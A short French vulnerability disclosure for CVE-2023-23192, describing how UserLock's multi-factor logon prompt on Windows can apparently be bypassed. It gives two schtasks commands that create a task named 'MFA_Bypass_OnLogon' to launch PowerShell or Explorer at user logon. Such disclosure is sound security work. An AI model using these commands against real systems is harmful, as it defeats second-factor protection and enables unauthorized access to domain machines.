
CVE-2023-23192
Description : Userlock est une solution d'authentification multi-facteurs pour Windows Active Directory et les environnements cloud afin d'empêcher tout accès non autorisé et indésirable. Il permet une authentification à deux facteurs (2FA) personnalisée lors de l'ouverture de session Windows, sur le Bureau à distance (RDP et RD Gateway), IIS, VPN et les applications cloud. Userlock vous permet de mettre en œuvre la MFA pour vos ouvertures de session Active Directory sur des postes de travail et serveurs membres d'un domaine. Une boîte de dialogue vous invite à saisir le code OTP, depuis l'application Authenticator, lors de la première ouverture de session de la journée sur votre poste de travail. Userlock s'intègre au processus d'ouverture de session pour fournir une authentification à deux facteurs.
L'une des stratégies les plus couramment exploitées par les acteurs de la menace pour établir une persistance sur l'ordinateur d'une victime est la planification des tâches. Les adversaires utilisent fréquemment cette stratégie pour échapper à la détection automatisée, maintenir leur persistance et mener des attaques surprises après de longues périodes de discrétion.
Vulnérabilité :
Créez une tâche planifiée qui s'exécute à l'ouverture de session de n'importe quel utilisateur.
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c powershell.exe"

Après une ouverture de session réussie avec les informations d'identification du domaine, le cmd.exe planifié est exécuté et la boîte de dialogue MFA de Userlock s'affiche.
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c explorer.exe"